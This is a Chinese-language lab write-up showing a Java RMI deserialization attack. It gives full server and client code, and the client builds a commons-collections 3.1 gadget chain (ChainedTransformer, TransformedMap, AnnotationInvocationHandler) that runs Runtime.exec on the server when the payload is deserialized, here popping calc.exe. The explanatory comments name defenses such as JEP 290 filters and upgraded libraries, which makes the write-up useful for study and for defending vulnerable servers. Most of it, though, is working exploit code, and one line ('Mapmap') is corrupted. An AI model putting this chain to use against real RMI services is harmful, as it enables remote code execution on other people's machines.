2. 反序列化漏洞出现的环境：JDK 1.7
commons-collections 3.1
commons-collections commons-collections 3.1
3.JAVA代码
Remote接口
import java.rmi.Remote;
import java.rmi.RemoteException;

/**
 * Remote interface registered by {@code RegistryServer} and looked up by the client.
 *
 * <p>The single method takes a plain {@code Object}. Over RMI that means the server JVM
 * deserializes whatever serializable graph the caller sends before {@code work} is even
 * entered, so the implementation cannot reject a hostile argument itself. Narrowing the
 * parameter to a specific type, or installing an {@code ObjectInputFilter} (JEP 290) in the
 * server JVM, limits what the server is willing to deserialize.
 */
public interface User extends Remote {
    /**
     * Invoked remotely with an arbitrary serializable argument.
     *
     * @param obj object sent by the caller; deserialized by the RMI transport on the server
     * @throws RemoteException on RMI transport failure
     */
    void work(Object obj) throws RemoteException;
}
实现类
import java.rmi.RemoteException;
import java.rmi.server.UnicastRemoteObject;

/**
 * Server-side implementation of {@link User}.
 *
 * <p>Extending {@link UnicastRemoteObject} exports the instance as soon as it is constructed.
 * {@link #work(Object)} only prints; by the time it runs, the argument has already been
 * deserialized by the RMI layer, so this method is not a place where unsafe input can be
 * filtered out.
 */
public class UserImpl extends UnicastRemoteObject implements User {

    /**
     * Exports this object on construction.
     *
     * @throws RemoteException if the object cannot be exported
     */
    protected UserImpl() throws RemoteException {
        super();
    }

    /**
     * Prints the argument's string form followed by a fixed marker line.
     *
     * @param obj object received from the remote caller; must not be {@code null}
     *            (a {@code null} argument fails on {@code toString()})
     * @throws RemoteException declared for RMI; not thrown by this body
     */
    @Override
    public void work(Object obj) throws RemoteException {
        String description = obj.toString();
        System.out.println(description);
        System.out.println("work被调用了");
    }
}
Registry
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

/**
 * Starts a local RMI registry and binds a {@code UserImpl} under the name {@code "user"}.
 *
 * <p>{@code LocateRegistry.createRegistry} listens on the given port without any
 * authentication, so every peer that can reach the port can send serialized objects to the
 * exported {@code User}. In the write-up this process is the one whose deserialization runs
 * the client's transformer chain; it is the JVM where an {@code ObjectInputFilter} (JEP 290)
 * and a patched commons-collections would have to be deployed.
 */
public class RegistryServer {

    /** Default RMI registry port used by the write-up. */
    private static final int REGISTRY_PORT = 1099;

    /** Name the client resolves via {@code Naming.lookup}. */
    private static final String BIND_NAME = "user";

    /**
     * Exports a {@code UserImpl}, creates the registry and binds the object, then prints a
     * ready marker. The process stays alive because the exported object keeps RMI threads running.
     *
     * @param args unused
     * @throws Exception if exporting or binding fails (for example, the port is in use)
     */
    public static void main(String[] args) throws Exception {
        User exported = new UserImpl();
        Registry localRegistry = LocateRegistry.createRegistry(REGISTRY_PORT);
        localRegistry.rebind(BIND_NAME, exported);
        System.out.println("rmi running....");
    }
}
rmi客户端
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;
import java.lang.annotation.Retention;
import java.lang.reflect.Constructor;
import java.rmi.Naming;
import java.util.HashMap;
import java.util.Map;

/**
 * RMI client from the write-up: resolves the remote {@code User} and passes it the object
 * graph built by {@link #getPayload()}.
 *
 * <p>Nothing in this class executes a command locally; the graph is only serialized here.
 * As the write-up states, it is the server JVM's deserialization of the argument (inside the
 * RMI transport, before {@code UserImpl.work} runs) that triggers the transformer chain.
 * The defensive lessons are on the server side: do not expose remote methods taking
 * {@code Object} to untrusted peers, install an {@code ObjectInputFilter} (JEP 290), and do
 * not ship commons-collections 3.1 — 3.2.2 and later refuse to deserialize these functors
 * by default.
 */
public class ClientDemo {

    /**
     * Looks up the remote object and invokes {@code work} with the constructed graph.
     *
     * @param args unused
     * @throws Exception on lookup, RMI or reflection failure
     */
    public static void main(String[] args) throws Exception{
        // Host/port of the machine running RegistryServer in the write-up's lab setup.
        String url = "rmi://192.168.1.106:1099/user";
        User userClient = (User) Naming.lookup(url);
        // The argument is serialized by RMI here and deserialized on the server.
        userClient.work(getPayload());
    }

    /**
     * Builds the commons-collections 3.1 object graph described in the write-up.
     *
     * <p>The graph is a {@code TransformedMap} whose value transformer is a
     * {@link ChainedTransformer}, wrapped in the JDK-internal
     * {@code sun.reflect.annotation.AnnotationInvocationHandler}. The write-up attributes the
     * trigger to the server deserializing this handler, which ends up writing a value into
     * the decorated map and therefore running the chain.
     *
     * @return the serializable graph sent as the argument of {@code User.work}
     * @throws Exception if the internal class or its constructor cannot be accessed
     */
    public static Object getPayload() throws Exception{
        // Each InvokerTransformer invokes the named method reflectively on the output of the
        // previous transformer: Runtime.class -> getMethod("getRuntime") -> invoke(null)
        // -> exec("calc.exe"). This is exactly the Runtime.getRuntime().exec(...) the
        // write-up mentions; the only thing that makes it dangerous is that it runs during
        // deserialization in another process.
        Transformer[] transformers = new Transformer[]{
            new ConstantTransformer(Runtime.class),
            new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", new Class[0]}),
            new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[0]}),
            new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc.exe"})
        };
        Transformer transformerChain = new ChainedTransformer(transformers);
        // Map map = new HashMap();
        // NOTE(review): "Mapmap" looks like a copy/paste artifact where the generic type
        // parameters were lost (probably Map<String, Object> map); left as published.
        Mapmap = new HashMap<>();
        // The map needs at least one entry; the value written here is replaced by the
        // chain's result when the map is re-populated during deserialization.
        map.put("value", "sijidou");
        // Key transformer is null (keys untouched); only values pass through the chain.
        Map transformedMap = TransformedMap.decorate(map, null, transformerChain);
        // JDK-internal class, hence Class.forName + setAccessible rather than a direct
        // constructor call. Its (Class, Map) constructor takes an annotation type and the
        // member-value map; Retention.class is simply an annotation type with a "value" member.
        Class cl = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor ctor = cl.getDeclaredConstructor(Class.class, Map.class);
        ctor.setAccessible(true);
        return ctor.newInstance(Retention.class, transformedMap);
    }
}
4.模拟
先运行RegistryServer类
再运行 ClientDemo，运行后就会弹出 RegistryServer 所在电脑的计算器。原理是：Java RMI 服务器在接收到客户端发送的序列化对象后，对该对象进行反序列化时执行了被注入的恶意代码 Runtime.getRuntime().exec("calc");